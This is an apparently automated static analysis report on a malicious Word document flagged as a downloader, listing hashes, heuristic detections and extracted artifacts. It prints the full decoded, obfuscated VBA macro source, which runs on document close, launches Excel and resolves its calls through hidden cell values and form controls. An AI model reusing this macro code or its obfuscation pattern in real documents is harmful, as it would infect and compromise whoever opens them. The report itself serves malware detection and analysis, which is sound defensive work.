Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5513f446c70d99f1…

MALICIOUS

Office (OOXML)

Size: 83.8 KB
Created: 2021-01-29 10:19:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-02-09
MD5: c392ce1bc528b47fb7ad67e23f8ca291
SHA-1: d48475181c9336cbb0a9932f7de63c8fd32a4f2e
SHA-256: 5513f446c70d99f1ed2089d69b899d20b05152777f392a655eed2a7373a19eda
Risk Score: 222

Heuristics (5)

  • ClamAV: Doc.Downloader.Valyria-10033915-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set axn = CreateObject(UserForm1.g8 & UserForm1.pq)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Set oi = CallByName(axn.Workbooks, UserForm1.mp & UserForm1.le, 1, UserForm2.ComboBox1, , , , UserForm1.rr)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/ink - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3d - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape - In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6984 bytes
SHA-256: 654c2b28716acc7bb98699d239f348c5dece11c160be9d884fa7bf7e1f3901fd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public g, jv, bv, j0, pm, axn, qy, m1r, jb, fn, zs, jw, o2, p7, gq, ip

Sub Document_Close()

qe = UserForm2.ComboBox12

k6

End Sub

Sub k6()

On Error Resume Next

UserForm2.ComboBox1.ListIndex = 5

Set axn = CreateObject(UserForm1.g8 & UserForm1.pq)

axn.DisplayAlerts = False

vq = 1301

vkq = 0

Err.Number = 0

While vq <> 0 And vkq < 32

Set oi = CallByName(axn.Workbooks, UserForm1.mp & UserForm1.le, 1, UserForm2.ComboBox1, , , , UserForm1.rr)

vq = Err.Number

vkq = vkq + 16

Wend

If vq <> 0 Then

ErrHandler:

lo = UserForm2.ComboBox28

mdr = CallByName(Application, UserForm1.o0 & UserForm1.dq, 2)

e2 = UserForm2.ComboBox14

If mdr <> False Then

ojk = UserForm2.ComboBox19

Set jg = CreateObject(UserForm1.bd4 & UserForm1.jf4)

CallByName jg.Documents, UserForm1.mp & UserForm1.le, 1, ActiveDocument.FullName, , True

qn = UserForm2.ComboBox21

CallByName jg, UserForm1.qs9 & UserForm1.f5, 1, Now + TimeSerial(0, 0, 2), UserForm1.hq & UserForm1.bi & "k6"

Else

CallByName Application, UserForm1.qs9 & UserForm1.f5, 1, Now + TimeSerial(0, 0, 17), UserForm1.hq & UserForm1.bi & "k6"

End If

axn.Quit

Exit Sub

End If

ri = UserForm2.ComboBox16

Dim ec

kl3 = UserForm2.ComboBox11

Set ec = axn.sheets(1)

oc = "'"

ip = axn.sheets(5).Cells(1, 1)

If Len(ip) < 1 Then

If axn.ActiveWorkbook.Title <> "Google" Then

GoTo ErrHandler

Else

Exit Sub

End If

End If

mm = ec.Cells(75, 12).Value

d4 = axn.sheets(1).Cells(7, 14).Value

fn = axn.sheets(1).Cells(6, 39).Value

zs = axn.sheets(2).Cells(142, 2).Value

pm = axn.sheets(2).Cells(80, 49).Value

d7 = axn.sheets(2).Cells(24, 42).Value

i1 = ec.Cells(143, 33).Value

iq = axn.sheets(3).Cells(98, 20).Value

w = axn.sheets(2).Cells(142, 10).Value

hu = axn.sheets(1).Cells(138, 35).Value

o2 = axn.sheets(2).Cells(107, 38).Value

qy = axn.sheets(1).Cells(124, 7).Value

l7 = UserForm2.ComboBox13

jb = axn.sheets(3).Cells(22, 50).Value

oj = axn.sheets(3).Cells(55, 36).Value

dx = axn.sheets(2).Cells(147, 10).Value

jw = axn.sheets(1).Cells(55, 56).Value

dw = axn.sheets(1).Cells(53, 40).Value

xoc = axn.sheets(2).Cells(71, 36).Value

g = axn.sheets(3).Cells(27, 18).Value

jm = axn.sheets(3).Cells(42, 52).Value

rd = axn.sheets(1).Cells(65, 24).Value

m1r = axn.sheets(3).Cells(22, 31).Value

jv = axn.sheets(3).Cells(138, 35).Value

kq = axn.sheets(3).Cells(99, 42).Value

zo = axn.sheets(2).Cells(54, 8).Value

gq = ""

Set Sh1 = axn.sheets(4)

qq = UserForm2.ComboBox8

po = 1

ux = UserForm2.ComboBox16

l1 = True

While l1

kz = Sh1.Cells(po, 1).Value

If Len(kz) < 1 Then

l1 = False

Else

gq = gq & kz

End If

po = po + 1

Wend

ex = CallByName(axn, hu, 2)

bu = UserForm2.ComboBox26

UserForm1.c2.Value = i1 & ex & xoc

UserForm1.aw.Value = d4

ed = UserForm2.ComboBox3

CallByName CreateObject(zo), rd, 1, UserForm1.c2, dw, UserForm1.aw

Set qiq = CreateObject(mm)

Set m8 = CallByName(qiq, d7, 2)

Set bb6 = CallByName(m8, kq, 1)

Set jb = CallByName(qiq, jb, 2)

Set j0 = qiq

qb = UserForm2.ComboBox14

UserForm5.ComboBox1 = "rb"

Set g = CallByName(p7, g, 2)

m1r = CallByName(g, m1r, 2)

UserForm1.rn.Value = jm & iq

UserForm3.ComboBox1 = w

UserForm1.rn.Value = oj

fy = UserForm2.ComboBox28

UserForm4.ComboBox1 = UserForm3.ComboBox1

UserForm3.ComboBox1 = m1r

qiq = bg

g9 = UserForm2.ComboBox23

oi = m3

ec = q9

m8 = ydt

bb6 = zx

jb = bsb

fn = iy

ia = UserForm2.ComboBox27

zs = i

p7 = i7

g = b

no = UserForm2.ComboBox16

j0 = hz

DoEvents

CallByName axn, dx, 1

axn = tx

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{FB8A4366-3BAF-40F1-8B9D-4B4B9427AE79}{52D85C0F-E4F3-4720-8DBD-50BB88A77865}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{484B5FBA-1BDC-47F0-9157-6080BE221AC8}{B1BEEB4F-5DE6-44D7-BD59-66903896B8BC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 

 p6 = UserForm2.Controls.Count - 1

mr = UserForm2.ComboBox3

 
 
 
 

 rs = ""
 For l5 = 1 To p6 Step 2
 rs = rs & UserForm2.Controls.Item(l5)
 Next

 ComboBox1.AddItem "f8"
 ComboBox1.AddItem "zg"
 ComboBox1.AddItem "ei"

vj = UserForm2.ComboBox23

 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"
 ComboBox1.AddItem rs
 ComboBox1.AddItem "gz"

ch = UserForm2.ComboBox6

 
 

gle = UserForm2.ComboBox13

 
 
 
 
 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{B4F4C947-037E-45C7-9747-3D7C3FC46B2F}{296C43D5-4F05-48B4-9666-4AA5EAE0A8BB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.g, ActiveDocument.qy, VbMethod, 1, ActiveDocument.m1r
 CallByName ActiveDocument.g, ActiveDocument.jv, VbMethod, UserForm1.rn.Value
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{9FD6C449-74FE-4C5C-AE85-B2919C80B9F1}{637DD3D2-D345-453B-BA86-7DD13026211E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()

e4 = UserForm2.ComboBox3

 CallByName ActiveDocument.j0, ActiveDocument.pm, VbMethod, UserForm1.rn.Value, ActiveDocument.gq, ActiveDocument.ip
End Sub

 

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{460C4ECD-7417-4DD1-9B6B-0E21F987A5F6}{8AB77A1A-0AF8-4236-8300-C55106B7617A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.fn = CallByName(ActiveDocument.jb, ActiveDocument.fn, VbGet)
 Set ActiveDocument.zs = CallByName(ActiveDocument.fn, ActiveDocument.zs, VbGet)
 Set ActiveDocument.p7 = CallByName(ActiveDocument.zs, ActiveDocument.jw, VbMethod, ActiveDocument.o2)
End Sub

vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 51200 bytes
SHA-256: 45e0bfab7f550b1ce7cda2ae5ee8ad244e63e46429c5c0691530d6e91b201ed7
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely